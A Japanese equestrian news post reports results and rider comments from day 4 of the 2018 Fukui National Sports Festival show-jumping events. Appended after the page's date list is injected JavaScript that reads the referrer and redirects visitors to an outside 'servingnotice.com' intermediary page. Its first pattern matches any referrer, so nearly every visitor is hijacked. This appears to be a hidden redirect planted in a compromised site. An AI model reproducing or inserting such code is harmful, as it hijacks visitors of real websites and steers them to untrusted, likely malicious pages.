News
2018 年 10 月 4 日
《福井国体》第4日速報(その2)
【第18競技 成年男子 国体大障害飛越競技】
 16人馬が出場したこの競技は145cmクラスで実施しました。ジャンプオフに進んだのは2人馬。先に走行した広田龍馬&ライフ・イズ・ビューティフル(栃木県)は1反抗とタイムオーバーで減点6、後から走行した西崎純郎&エクスキャリバー(岡山県)は1落下で減点4となり、西崎&エクスキャリバーが優勝しました。3位はオリジナルコースで減点4だった岩館正彦&I’mキングスクロス(奈良県)でした。


▲西崎純郎&エクスキャリバー
「17回目の国体出場でようやく優勝することができました。嬉しいです。ジャンプオフでは良い流れだったのですが、落下した最終障害前は自分でも力んでいるのがわかりました。次回はそのようなことなく勝てるようにしたいです」

【第19競技 成年女子 トップスコア競技】
 24人馬が出場したトップスコア競技で圧巻の走行を見せたのは、佐藤泰&美虎(長野県)でした。昨日、標準障害を優勝して「トップスコアでは1600点くらい取りたい」と話していましたが、目標を上回る1680点を獲得しました。2位は1540点の原田いずみ&ディナスティ(鹿児島県)、3位は1520点の山口真奈&ジュリアス・ファータ(東京都)でした。


▲佐藤泰&美虎
「このコース取りは下見の時にひらめきました。前半の落ち着いている時に、高い得点の障害物を飛ぶ作戦がうまくいきました。昨日と今日、馬もしっかり応えて頑張ってくれたので良かったです」

【第20競技 少年 ダービー競技】
 全長730mのダービー競技には22人馬が出場、3人馬がジャンプオフに進みました。小栗麻莉乃&マ
リアンモナーク(岐阜県)が唯一のダブルクリアラウンドで優勝、開催県福井の上田瑠威&マラドーナが減点8で2位、吉田彩音&クラシックオーマン(滋賀県)が減点12で3位となりました。



▲小栗麻莉乃&マリアンモナーク
「去年、二段階競技で1位だったので、今年もまた優勝できて良かったです。ジャンプオフでは最初の障害でモナちゃんが助けてくれて、そのまま自分のできる限りの走行をすることができました。来年も国体に出場して良い成績を残したいです」

 最終日を前に、天皇杯(男女総合)は福井県が82点で1位、皇后杯(女子総合)も福井県が30点で1位となっています。


福井国体馬術競技の結果はこちらから(大会公式サイトへのリンク)。
aaaa

  • 2018.10.06
  • 2018.10.18
  • 2018.10.18
  • 2018.10.18
  • 2018.09.25
  • 2018.09.05
  • 2018.08.30
  • 2018.09.24
  • 2018.10.05
  • 2018.10.18
  • 2018.07.02
  • 2018.06.04
  • 2018.10.04


var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter2/intermediary.html?outlet80com"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;